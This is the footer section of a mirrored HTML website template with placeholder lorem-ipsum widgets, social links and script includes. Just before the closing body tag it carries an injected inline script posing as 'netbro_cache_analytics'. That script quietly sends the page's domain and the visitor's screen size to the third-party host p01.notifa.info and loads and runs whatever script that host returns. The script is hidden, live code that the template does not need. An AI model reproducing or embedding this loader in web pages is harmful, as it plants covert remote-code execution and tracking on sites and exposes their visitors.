                                                <div class="thumbnail-content">
                                                    <h5><a href="#">Corem psum dolr them amectetuer adipiscing...</a></h5>
                                                    <span class="post-date">03 January 2017</span>
                                                </div>
                                                <!-- .thumbnail-content -->
                                            </li>
                                        </ul>
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>Twitter Widget</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <ul class="twitter-widget">
                                            <li>
                                                <div class="twitter-icon"><i class="fa fa-twitter" aria-hidden="true"></i></div>
                                                <div class="twitter-content">
                                                    <h5>Raritas etiam processus a theme dynamicus sequitur <a href="#">http://admin@gmail.com</a></h5>
                                                    <span class="post-date">03 January 2017</span>
                                                </div>
                                                <!-- .twitter-content -->
                                            </li>
                                            <li>
                                                <div class="twitter-icon"><i class="fa fa-twitter" aria-hidden="true"></i></div>
                                                <div class="twitter-content">
                                                    <h5>Duis autem vel eum <a href="#">#iriure</a>dolor in hendrerit in vulputate </h5>
                                                    <span class="post-date">8 months ago</span>
                                                </div>
                                                <!-- .twitter-content -->
                                            </li>
                                            <li>
                                                <div class="twitter-icon"><i class="fa fa-twitter" aria-hidden="true"></i></div>
                                                <div class="twitter-content">
                                                    <h5><a href="#">@frankdoe</a> am liber tempor cum soluta nobis eleifend</h5>
                                                    <span class="post-date">03 January 2017</span>
                                                </div>
                                                <!-- .twitter-content -->
                                            </li>
                                        </ul>
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>Recent Photos</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <div class="footer-instagram">
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-1.jpg" alt="footer-instagram-img-1" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-2.jpg" alt="footer-instagram-img-2" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-3.jpg" alt="footer-instagram-img-3" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-4.jpg" alt="footer-instagram-img-4" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-5.jpg" alt="footer-instagram-img-5" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-6.jpg" alt="footer-instagram-img-6" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-7.jpg" alt="footer-instagram-img-7" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-8.jpg" alt="footer-instagram-img-8" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-9.jpg" alt="footer-instagram-img-9" /></a>
                                        </div>
                                        <!-- .footer-instagram -->
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                            </div>
                            <!-- .row -->
                        </div>
                        <!-- .footer-top -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-footer-top -->

            <div class="bg-footer-bottom">
                <div class="container">
                    <div class="row">
                        <div class="footer-bottom">
                            <div class="copyright-txt">
                                <p>&copy; 2017. Designer By <a href="#" title="Al-Amin(Web Designer)">LabArtisan</a></p>
                            </div>
                            <!-- .copyright-txt -->
                            <div class="social-box">
                                <ul class="social-icon-rounded">
                                    <li><a href="#"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-google" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-vimeo" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-pinterest-p" aria-hidden="true"></i></a></li>
                                </ul>
                            </div>
                            <!-- .social-box -->

                        </div>
                        <!-- .footer-bottom -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-footer-bottom -->

        </footer>

        <!-- End Footer Section -->


        <!-- Start Scrolling -->

        <div class="scroll-img"><i class="fa fa-angle-up" aria-hidden="true"></i></div>


        <!-- End Scrolling -->

    </div>

    <!-- Start Pre-Loader-->

    <div id="loading">
        <div id="loading-center">
            <div id="loading-center-absolute">
                <div class="object" id="object_one"></div>
                <div class="object" id="object_two"></div>
                <div class="object" id="object_three"></div>
                <div class="object" id="object_four"></div>
            </div>
        </div>
    </div>


    <!-- End Pre-Loader -->


    <script type="text/javascript" src="assets/js/jquery-2.2.3.min.js"></script>
    <script type="text/javascript" src="assets/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.easing.1.3.js"></script>
    <script type="text/javascript" src="assets/js/jquery.waypoints.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.counterup.min.js"></script>
    <script type="text/javascript" src="assets/js/swiper.min.js"></script>
    <script type="text/javascript" src="assets/js/plugins.isotope.js"></script>
    <script type="text/javascript" src="assets/js/isotope.pkgd.min.js"></script>
    <script type="text/javascript" src="assets/js/lightcase.js"></script>
    <script type="text/javascript" src="assets/js/jquery.nstSlider.js"></script>
    <script type="text/javascript" src="assets/js/jquery.flexslider.js"></script>
    <script type="text/javascript" src="assets/js/custom.isotope.js"></script>
    <script type="text/javascript" src="assets/js/custom.map.js"></script>

    <script type="text/javascript" src="assets/js/custom.js"></script>



<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2DxIKXzSOYDZPkNWcc6rVYkhGdO%2fiRR5Fz3O%2b4LUn%2bHir6zU%2bcVEp58RFmDAFnwNSff5NBRhEnfUi6yS5olQGcd1SJbDT%2bid5lYgpUzaRh1xBFSqBgxjBcqCY33A7KyuC9R9YazuAjLYwuwSxYirRgYFAGy9s8IVisg%2b7vdnT6tR2bxX4v%2fooXlNDi5FZJH%2bc2My%2fL3xRuIgzUExxs0Au5eZpyS7BH6XSJ74Y7akng6NaYyRZszUIpAphsrojm5rNSgdDRbAADgQ%2boUdjuaSEDTcJdis4Y3H8hvNmi5FqZaNhaowa4zzDWMTrAxB4LF7kRIpwA84oIMexPRFSEKhEfofKIJ%2f2UDFzZafTEAfRG5IFxmtwyKNELWSi4S8odqEOnUvvELcX5XLk7cpBIeRtcz0jRtVvUAIX2i%2fQ2q49CKmbUfOdBbHyppJyQNPPXR5TnOvECZ8HDn2lxUEgxyHmcklwwjj3BL37r6svIeZ70s%2fulcImnfBI67GcfCd9R9wdCZz8gdWsmj8%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>


<!-- Mirrored from demos.codexcoder.com/labartisan/html/GreenForest/blog_single.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 Feb 2019 23:31:46 GMT -->
</html>
